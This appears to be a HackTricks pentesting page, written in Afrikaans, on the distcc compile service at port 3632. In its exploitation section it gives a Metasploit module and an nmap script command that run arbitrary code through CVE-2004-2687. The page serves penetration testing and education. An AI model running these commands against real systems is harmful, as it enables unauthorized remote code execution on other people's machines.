3632 - Pentesting distcc

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Basiese Inligting

Distcc is 'n hulpmiddel wat die kompilasieproses verbeter deur die idle verwerkingskrag van ander rekenaars in die netwerk te benut. Wanneer distcc op 'n masjien opgestel is, kan hierdie masjien sy kompilasietake na 'n ander stelsel versprei. Hierdie ontvangerstelsel moet die distccd daemon draai en moet 'n kompatible kompileerder geïnstalleer hê om die gestuurde kode te verwerk.

Standaard poort: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Kontroleer of dit kwesbaar is vir CVE-2004-2687 om arbitrêre kode uit te voer:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Ek dink nie shodan detecteer hierdie diens nie.

Resources

Post geskep deur Álex B (@r1p)

Support HackTricks

Kyk na die subscription plans!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Previous3389 - Pentesting RDP Next3690 - Pentesting Subversion (svn server)

Last updated 4 months ago